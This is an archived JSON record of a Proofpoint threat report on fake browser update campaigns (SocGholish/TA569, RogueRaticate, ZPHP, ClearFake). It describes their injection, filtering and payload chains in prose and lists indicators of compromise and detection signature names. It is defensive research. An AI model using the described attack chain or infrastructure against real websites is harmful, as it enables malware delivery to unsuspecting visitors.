{
	"id": "99a08e74-79ac-4498-9c0c-94277b5dc968",
	"created_at": "2026-04-06T00:12:12.985471Z",
	"updated_at": "2026-04-10T03:33:16.462893Z",
	"deleted_at": null,
	"sha1_hash": "85e7565128b2876891f5dc9a7c4facad7071f539",
	"title": "Beware Fake Browser Updates: TA569, Rogueraticate \u0026 More | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1819950,
	"plain_text": "Beware Fake Browser Updates: TA569, Rogueraticate \u0026 More |\r\nProofpoint US\r\nBy October 17, 2023 Dusty Miller\r\nPublished: 2023-10-09 · Archived: 2026-04-05 21:42:03 UTC\r\nKey Takeaways \r\nProofpoint is tracking multiple different threat clusters that use similar themes related to fake browser\r\nupdates. \r\nFake browser updates abuse end user trust with compromised websites and a lure customized to the user's\r\nbrowser to legitimize the update and fool users into clicking. \r\nThreat actors do not send emails to share the compromised websites. The threat is only in the browser and\r\ncan be initiated by a click from a legitimate and expected email, social media site, search engine query, or\r\neven just navigating to the compromised site. \r\nThe different campaigns use similar lures, but different payloads. It is important to identify which\r\ncampaign and malware cluster the threat belongs to help guide defender response. \r\nOverview \r\nProofpoint is currently tracking at least four distinct threat clusters that use fake browser updates to distribute\r\nmalware. Fake browser updates refer to compromised websites that display what appears to be a notification from\r\nthe browser developer such as Chrome, Firefox, or Edge, informing them that their browser software needs to be\r\nupdated. When a user clicks on the link, they do not download a legitimate browser update but rather harmful\r\nmalware.   \r\nBased on our research, TA569 has used fake browser updates for over five years to deliver SocGholish malware,\r\nbut recently other threat actors have been copying the lure theme. Each threat actor uses their own methods to\r\ndeliver the lure and payload, but the theme takes advantage of the same social engineering tactics. The use of fake\r\nbrowser updates is unique because it abuses the trust end users place in both their browser and the known sites\r\nthat they visit.  \r\nThreat actors that control the fake browser updates use JavaScript or HTML injected code that directs traffic to a\r\ndomain they control, which can potentially overwrite the webpage with a browser update lure specific to the web\r\nbrowser that the potential victim uses. A malicious payload will then automatically download, or the user will\r\nreceive a prompt to download a “browser update,” which will deliver the payload. \r\nFake browser update lure and effectiveness \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 1 of 9\n\nThe fake browser update lures are effective because threat actors are using an end-user's security training against\r\nthem. In security awareness training, users are told to only accept updates or click on links from known and\r\ntrusted sites, or individuals, and to verify sites are legitimate. The fake browser updates abuse this training because\r\nthey compromise  trusted sites and use JavaScript requests to quietly make checks in the background and\r\noverwrite the existing, website with a browser update lure. To an end user, it still appears to be the same website\r\nthey were intending to visit and is now asking them to update their browser. \r\nProofpoint has not identified threat actors directly sending emails containing malicious links, but, due to the\r\nnature of the threat, compromised URLs are observed in email traffic in a variety of ways. They are seen in\r\nnormal email traffic by regular end users who are unaware of the compromised websites, in monitoring emails\r\nsuch as Google alerts, or in mass automated email campaigns like those distributing newsletters. This creates a\r\nsituation where these emails are considered to be malicious during the time the site is compromised. Organizations\r\nshould not treat the fake browser update threats as only an email problem, as end users could visit the site from\r\nanother source, such as a search engine, social media site, or simply navigate to the site directly and receive the\r\nlure and potentially download the malicious payload. \r\nEach campaign uniquely filters traffic to hide from researchers and delay discovery, but all the methods are\r\neffective at filtering. While this may reduce the potential spread of malicious payloads, it enables actors to\r\nmaintain their access to the compromised sites for longer periods of time. This can complicate the response,\r\nbecause with the multiple campaigns and changing payloads, responders must take time to figure out what they\r\nneed to look for and identify the relevant indicators of compromise (IOCs) at the time of the download. \r\nCampaigns \r\nThe current landscape includes four different threat clusters using unique campaigns to deliver fake browser\r\nupdate lures. Due to the similarity in the lures and attack chain, some public reporting has incorrectly attributed\r\nthe activity to the same threat cluster. Based on Proofpoint's distinct visibility, Proofpoint researchers were able to\r\nbreak these into more granular clusters. \r\nProofpoint’s research focuses on the fake browser update landscape overall, to provide details on how defenders\r\ncan identify each unique campaign, as well as additional links to additional Proofpoint or third-party reporting\r\ncontaining in-depth research and analysis. For example, Jérôme Segura of Malwarebytes has put together a good\r\nresource showing some of the images each campaign uses as lures on GitHub.  \r\nEach campaign has some general shared characteristics that can be described as three distinct stages of the\r\ncampaign. “Stage 1” is a malicious injection on a legitimate, but compromised, website. “Stage 2” refers to the\r\ntraffic to and from the actor-controlled domain that does most of the filtering and hosts the lure and malicious\r\npayload. “Stage 3” is the execution of the payload on a host after download.  \r\nSocGholish\r\nSocGholish is the primary threat that people think of when talking about a fake browser update lure and it has\r\nbeen well documented over the years. Proofpoint typically attributes SocGholish campaigns to a threat actor\r\nknown as TA569. Proofpoint has observed TA569 act as a distributor for other threat actors. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 2 of 9\n\nCurrently, TA569 is using three different methods to direct traffic from the stage 1 compromised websites to their\r\nactor-controlled stage 2 shadowed domains. \r\nThe first method is using an injection that utilizes the Keitaro traffic distribution system (TDS) via a variety of\r\nactor-controlled domains. Those domains will filter some requests out before routing to the stage 2 domains. Most\r\nof the injects that point to Keitaro TDS URLs will contain multiple different redirect domains in the same file, as\r\nseen in figure 2 below.  \r\nThe second method TA569 uses is Parrot TDS (also known as NDSW/NDSX) to obfuscate their injected code and\r\napply similar filtering before routing requests to the stage 2 domains. Compromised websites may contain as\r\nmany as 10 malicious JavaScript files that all contain Parrot TDS injections leading to SocGholish payloads.  \r\nThe third method TA569 uses is a simple JavaScript asynchronous script request in compromised websites’ HTML\r\nthat reaches out to a stage 2 domain.  \r\nThe variety of injections make it difficult for defenders to both identify the location of the malicious injection and\r\nreproduce the traffic due to the various stages of filtering. \r\nEach of these methods reaches out to a stage 2 domain which does additional filtering and will deliver the fake\r\nbrowser update lure and payload to traffic that passes the filtering. The payload can be either a plain JavaScript\r\n(.js) file, usually named “Update.js”, or a zipped JavaScript file. If the payload is executed by the user, it will first\r\nfingerprint the host via wscript. Depending on the results of the fingerprinting, the JavaScript will either quit, load\r\na remote access trojan (RAT), or wait for further commands from the threat actor, which has been reported leading\r\nto Cobalt Strike or BLISTER Loader. Proofpoint has recently observed SocGholish infections leading to\r\nAsyncRAT and NetSupport RAT as the RAT payloads. \r\n Figure 1. SocGholish fake update lure spoofing a Chrome update.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 3 of 9\n\nFigure 2. Keitaro TDS inject example.  \r\nFigure 3. Parrot (NDSW) inject example. \r\nFigure 4. Asynchronous inject example. \r\nRogueRaticate/FakeSG  \r\nThe second fake browser update our researchers identified is known as RogueRaticate or FakeSG. Proofpoint first\r\nidentified this activity in May 2023, and third-party researchers dubbed it a copy of the existing and high-volume\r\nSocGholish campaigns. The activity may have started in the wild as early as November 2022. Proofpoint does not\r\nattribute the RogueRaticate activity to a tracked threat actor at this time, and it has consistently been distinctly\r\ndifferentiated from SocGholish campaigns. \r\nRogueRaticate injects heavily obfuscated JavaScript code into existing JavaScript files on stage 1 websites. The\r\ninjected JavaScript reaches out to a stage 2 domain. The stage 2 domain hosts a Keitaro TDS that filters out\r\nunwanted requests and responds with a blank “body” value in a JSON response. When it identifies a target to\r\nreceive the lure, it sends the lure double Base64 encoded in the “body” value. The lure contains a button which, if\r\npressed, uses an HTML href attribute to download the payload from a separate compromised site, typically hosted\r\non WordPress.  \r\nThe fake update payload for the RogueRaticate campaigns has always involved an HTML Application (.hta) file.\r\nThe HTA is either zipped or downloaded via a shortcut (.url) file that points to the .lnk. The .hta file typically\r\nloads a malicious NetSupport RAT payload onto the host via the same stage 2 domain that hosted the malicious\r\npayload. \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 4 of 9\n\nFigure 5. Example RogueRaticate fake update lure spoofing a Chrome update.  \r\n Figure 6. Example RogueRaticate inject.  \r\nZPHP/SmartApeSG  \r\nProofpoint first identified another new cluster of fake update campaigns leading to NetSupport RAT in June 2023.\r\nThe activity was first publicly reported by Trellix in August 2023. This activity has been referred to as ZPHP by\r\nProofpoint or SmartApeSG in public documentation. The inject is a simple script object that is added into a\r\ncompromised website’s HTML code. It makes an asynchronous request to either “/cdn/wds.min.php” or “/cdn-js/wds.min.php” on a stage 2 domain. The response is heavily obfuscated JavaScript code that will attempt to\r\ncreate an iframe and make a second request to “/zwewmrqqgqnaww.php?reqtime=\u003cepoch time\u003e” which appears\r\nto filter out undesired requests and return the browser update lure to non-filtered requests. The payload is\r\ndownloaded via a base64 encoded zip file.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 5 of 9\n\nThe zipped browser update payload usually contains a JavaScript (.js) file that will load a malicious NetSupport\r\nRAT payload onto the host. Proofpoint has also seen the .zip contain an executable (.exe) that loaded Lumma\r\nStealer. \r\nFigure 7. Example ZPHP lure spoofing a Chrome update. \r\nFigure 8. Example ZPHP inject. \r\nProofpoint does not currently attribute the ZPHP activity to an actor with a TA number designation. \r\nClearFake  \r\nIn August 2023, third-party researchers published details on a fake browser update threat activity known as\r\nClearFake. Proofpoint subsequently identified consistent campaigns related to this cluster and observed a series of\r\nchanges in the short amount of time while monitoring it. The inject is a base64 encoded script added to the HTML\r\nof the compromised webpage. Proofpoint observed the injection pointing to a variety of services including\r\nCloudflare Workers, a file hosted on an actor’s GitHub, and most recently the blockchain network known as\r\nBinance Smart Chain. The initial request directs traffic to a stage 2 domain that hosts the Keitaro TDS filtering\r\nservice to filter requests. The actor uses newly registered stage 2 domains, which, if a visitor passes the filtering,\r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 6 of 9\n\ncreate an iFrame of the fake update lure hosted on the stage 2 domain. Clicking on the update button will result in\r\na download of the payload which has been observed hosted on Dropbox and OneDrive. \r\nThe observed payload was either an executable (sometimes zipped), .msi, and .msix that leads to the installation of\r\na variety of stealers including Lumma, Redline, and Raccoon v2. \r\nFigure 9. Example ClearFake lure spoofing a Chrome update. \r\nFigure 10. Example ClearFake injection. \r\nNotably, Proofpoint has observed ClearFake display the fake update lures in certain languages to match the\r\nbrowser's set language, including French, German, Spanish, and Portuguese. Proofpoint does not attribute the\r\nClearFake activity to an actor with a TA number designation. \r\nConclusion \r\nProofpoint has observed an increase in threat activity using fake browser updates to deliver a variety of malware\r\nincluding payloads. SocGholish and TA569 have demonstrated that compromising vulnerable websites to display\r\nfake browser updates works as a viable method for malware delivery, and new actors have learned from TA569\r\nand started to adopt the lure in their own ways. These copycats may be using information stealers and RATs\r\ncurrently, but could easily pivot to being an initial access broker for ransomware.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 7 of 9\n\nThe activity detailed in this report can be hard for security teams to detect and prevent and may present difficulties\r\nwith communicating the threat to end users due to the social engineering techniques and website compromises\r\nused by the threat actor. The best mitigation is defense in depth. Organizations should have network detections in\r\nplace – including using the Emerging Threats ruleset – and use endpoint protection. Additionally, organizations\r\nshould train users to identify the activity and report suspicious activity to their security teams. This is very specific\r\ntraining but can easily be integrated into an existing user training program. A tool such as Proofpoint’s Browser\r\nIsolation can also help prevent successful exploitation when compromised URLs are received via email and\r\nclicked on. \r\nSpecific indicators of compromise (IOCs) associated with the identified activities change regularly, as the threat\r\nactors are routinely moving their infrastructure and changing details in their payloads. The infosec.exchange\r\naccount @monitorsg is a useful public resource for following along with recent details on payloads and\r\ninfrastructure changes. The Emerging Threats Ruleset has domain rules available for most of the current threats\r\nand is regularly updating and publishing new rules to block all fake browser update campaigns.  \r\nHunting IOCs and Payload Examples (As of 2023-09-28): \r\nSocGholish: \r\nC2 URI: \r\n/editContent \r\n8bdc4c1cd197808056e50b8b958acd380bf8a69b63aedef3f9854173c6714b32 \r\n3fb9740940d44eef823b7ff17f0274a12345a6f238cf46a1133a9e39c7b97c62 \r\nRogueRaticate: \r\nKeitaro TDS Hosted on: \r\n178.159.37.73 \r\n178.159.37.25 \r\n1d9900c8dbaa47d2587d08b334d483b06a39acb27f83223efc083759f1a7a4f6 \r\n08d9df800127f9fb7ff1a246346e1cf5cfef9a2521d40d6b2ab4e3614a19b772 \r\nZPHP: \r\nInjects lead to paths: \r\n/cdn/wds.min.php \r\n/cdn-js/wds.min.php \r\n/cdn/zwmrqqgqnaww.php \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 8 of 9\n\n/cdn/zwewmrqqgqnaww.php \r\ne9580370160d39ef010dfdbfa614820cfe464507ce344a11bcbe760902297c8f \r\n0b28e9df9daf8a3d0aa3dc8a066a34134916dfacd9ba5d25d78e097525f66492 \r\nClearFake: \r\nChrome lure on: \r\n/lander/chrome/_index.php \r\n37bba90d20e429ce3fd56847e4e7aaf83c62fdd70a7dbdcd35b6f2569d47d533 \r\nab282db6f1fc4b58272cef47522be19d453126b69f0e421da24487f54d611b2f \r\nEmerging Threats Signatures: (All Open Sigs available for free) \r\n“ET MALWARE SocGholish Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET MALWARE SocGholish CnC Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET EXPLOIT_KIT RogueRaticate Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to RogueRaticate (4cdcb)\" \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to RogueRaticate (3a7ee)\" \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to ClearFake (71eb8)” \r\n“ET EXPLOIT_KIT ZPHP Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates"
	],
	"report_names": [
		"are-you-sure-your-browser-date-current-landscape-fake-browser-updates"
	],
	"threat_actors": [
		{
			"id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5",
			"created_at": "2024-04-24T02:00:49.453475Z",
			"updated_at": "2026-04-10T02:00:05.321256Z",
			"deleted_at": null,
			"main_name": "Mustard Tempest",
			"aliases": [
				"Mustard Tempest",
				"DEV-0206",
				"TA569",
				"GOLD PRELUDE",
				"UNC1543"
			],
			"source_name": "MITRE:Mustard Tempest",
			"tools": [
				"SocGholish",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34",
			"created_at": "2024-06-19T02:03:08.096988Z",
			"updated_at": "2026-04-10T02:00:03.82859Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"Mustard Tempest ",
				"TA569 ",
				"UNC1543 "
			],
			"source_name": "Secureworks:GOLD PRELUDE",
			"tools": [
				"SocGholish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544cac23-af15-4100-8f20-46c07962cbfa",
			"created_at": "2023-01-06T13:46:39.484133Z",
			"updated_at": "2026-04-10T02:00:03.34364Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"TA569",
				"UNC1543"
			],
			"source_name": "MISPGALAXY:GOLD PRELUDE",
			"tools": [
				"FakeUpdates",
				"FakeUpdate",
				"SocGholish"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434332,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.pdf",
		"text": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.txt",
		"img": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.jpg"
	}
}